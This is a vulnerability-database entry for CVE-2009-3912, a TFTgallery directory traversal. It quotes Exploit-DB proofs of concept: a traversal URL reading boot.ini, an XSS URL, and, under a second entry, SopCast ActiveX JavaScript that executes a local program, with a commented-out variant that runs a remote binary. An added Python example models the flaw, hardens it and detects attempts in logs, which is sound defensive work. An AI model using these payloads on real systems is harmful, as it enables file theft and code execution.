CVE-2009-3912
Published: 2009-11-09
Priority: P4 · 32 · medium · CVSS 2.0 base score: 5 · vector: AV:N/AC:L/Au:N/C:P/I:N/A:N
Exploit: available · EPSS: 2.74% (84.3rd percentile)
Directory traversal vulnerability in index.php in TFTgallery 0.13 allows remote attackers to read arbitrary files via a ..%2F (encoded dot dot slash) in the album parameter.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| tftgallery | tftgallery | — | — |
No detection rules found.
Exploit-DB: TFTgallery .13 - Directory Traversal (exploitdb · 2009-11-02 · CVE-2009-3912)
---
Released information about the album parameter being vulnerable to XSS
earlier. Seems there are other similar issues:
The album parameter is vulnerable to directory traversal
http://example.com/tftgallery/index.php?album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00&page=1
The sample parameter is vulnerable to XSS
http://example.com/tftgallery/settings.php?sample='>alert('blake XSS test')&name=cucumber%20cool
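The PoC above only shows the request. The following is an added example, not code from the page or from TFTgallery, that models what such a request does on the server and how to catch it in access logs. The `legacy_resolve` function is a generic stand-in for the 2009-era PHP pattern of gluing a decoded GET parameter into a file path (with the NUL-byte truncation PHP file functions performed before 5.3.4); it is not TFTgallery's actual source. The gallery root `/var/www/tftgallery/albums`, the `/album.txt` suffix and the log lines are all assumptions constructed for the demonstration. It goes slightly beyond the PoC by also handling a `%2e%2e%2f`-encoded variant and a legitimate album name that merely contains two dots.

```python
"""Models CVE-2009-3912-style traversal in a gallery's album parameter.

Constructed example: the TFTgallery source is not reproduced here; the
'legacy' resolver only mimics the common 2009-era PHP pattern of gluing a
decoded GET parameter into a filesystem path, including the NUL-byte
truncation that PHP file functions performed before 5.3.4.
"""
import posixpath
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Assumed install location of the gallery's album directory (hypothetical).
GALLERY_ROOT = "/var/www/tftgallery/albums"

# The album value from the Exploit-DB PoC: ten encoded "../", a file name,
# and a trailing %00.
EXPLOIT_ALBUM = "..%2F" * 10 + "boot.ini%00"


def legacy_resolve(album, root=GALLERY_ROOT, suffix="/album.txt"):
    """Path a naive concatenation would open (vulnerable behaviour).

    PHP already percent-decodes $_GET, so %2F becomes "/" and %00 becomes a
    NUL byte; the NUL cut the C string, dropping whatever the app appended.
    """
    decoded = unquote(album)
    path = root + "/" + decoded + suffix
    path = path.split("\x00", 1)[0]          # NUL truncation (PHP < 5.3.4)
    return posixpath.normpath(path)


def safe_resolve(album, root=GALLERY_ROOT, suffix="/album.txt"):
    """Hardened counterpart: returns None unless the path stays under root.

    Rejects NUL bytes outright, normalises the candidate, then requires a
    root-prefix match on the *normalised* path (a raw substring check on
    ".." would also reject legitimate names like "summer..2009"). In a live
    app, resolve symlinks with realpath before the prefix check.
    """
    decoded = unquote(album)
    if "\x00" in decoded:
        return None
    # posixpath.join discards root if decoded is absolute; the prefix check
    # below catches that case as well.
    candidate = posixpath.normpath(posixpath.join(root, decoded) + suffix)
    if not candidate.startswith(root + "/"):
        return None
    return candidate


REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')


def is_traversal_value(value):
    """True if a decoded parameter value contains a NUL or a ".." path segment."""
    if "\x00" in value:
        return True
    segments = value.replace("\\", "/").split("/")
    return ".." in segments


def flag_requests(log_lines, script="/index.php", param="album"):
    """Return client IPs of requests whose album parameter attempts traversal.

    Works on combined-format access-log lines; the query string is decoded
    once by parse_qs, so %2e%2e%2f and ..%2F variants both become "../".
    """
    flagged = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        parts = urlsplit(m.group(1))
        if not parts.path.endswith(script):
            continue
        values = parse_qs(parts.query, keep_blank_values=True).get(param, [])
        if any(is_traversal_value(v) for v in values):
            flagged.append(line.split(" ", 1)[0])
    return flagged


# Constructed access-log lines (not real traffic): a benign album, the PoC
# from Exploit-DB, a %2e%2e-encoded variant, and a name that merely contains
# two dots.
LOG_LINES = [
    '203.0.113.5 - - [09/Nov/2009:10:00:01 +0000] '
    '"GET /tftgallery/index.php?album=holiday&page=1 HTTP/1.1" 200 4321',
    '203.0.113.7 - - [09/Nov/2009:10:00:02 +0000] '
    '"GET /tftgallery/index.php?album=' + EXPLOIT_ALBUM + '&page=1 HTTP/1.1" 200 512',
    '203.0.113.9 - - [09/Nov/2009:10:00:03 +0000] '
    '"GET /tftgallery/index.php?album=%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 1024',
    '203.0.113.11 - - [09/Nov/2009:10:00:04 +0000] '
    '"GET /tftgallery/index.php?album=summer..2009&page=2 HTTP/1.1" 200 4000',
]

if __name__ == "__main__":
    print("vulnerable resolver opens:", legacy_resolve(EXPLOIT_ALBUM))
    print("hardened resolver returns:", safe_resolve(EXPLOIT_ALBUM))
    print("flagged clients:", flag_requests(LOG_LINES))
```

Running it shows the vulnerable resolver collapsing the PoC value to `/boot.ini` once the NUL drops the appended suffix, the hardened resolver refusing it, and the log scan flagging only the two traversal attempts while leaving `summer..2009` alone. The prefix check is deliberately done after normalisation; checking for `..` in the raw string is what produces both false positives on odd album names and misses on encoded variants.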
Exploit-DB: Sopcast SopCore Control - 'sopocx.ocx' Command Execution (exploitdb · 2009-03-03 · CVE-2009-0811)
---
```javascript
// Exploit-DB PoC as posted. It expects the SopCast sopocx.ocx ActiveX control
// to be instantiated on the page under the name SopPlayer (the <object> tag is
// not part of the indexed excerpt), so it only runs in Internet Explorer.
window.onload = function () {
  SopPlayer.InitPlayer();
  // Original author's commented-out UNC variant for running a remote binary:
  //SopPlayer.SetExternalPlayer("\\\\192.168.0.1\\c$\\PATH\\TO\\MALICIOUS_PROGRAM.EXE");
  SopPlayer.SetExternalPlayer("c:\\WINDOWS\\system32\\calc.exe"); // path the control executes
  SopPlayer.SetSopAddress("sop://broker.sopcast.com:3912/6002"); //A LIVE CHANNEL ...
  SopPlayer.SetChannelName("CCTV5");
  SopPlayer.Play();
};
```
# milw0rm.com [2009-03-03]
No writeups or analysis indexed.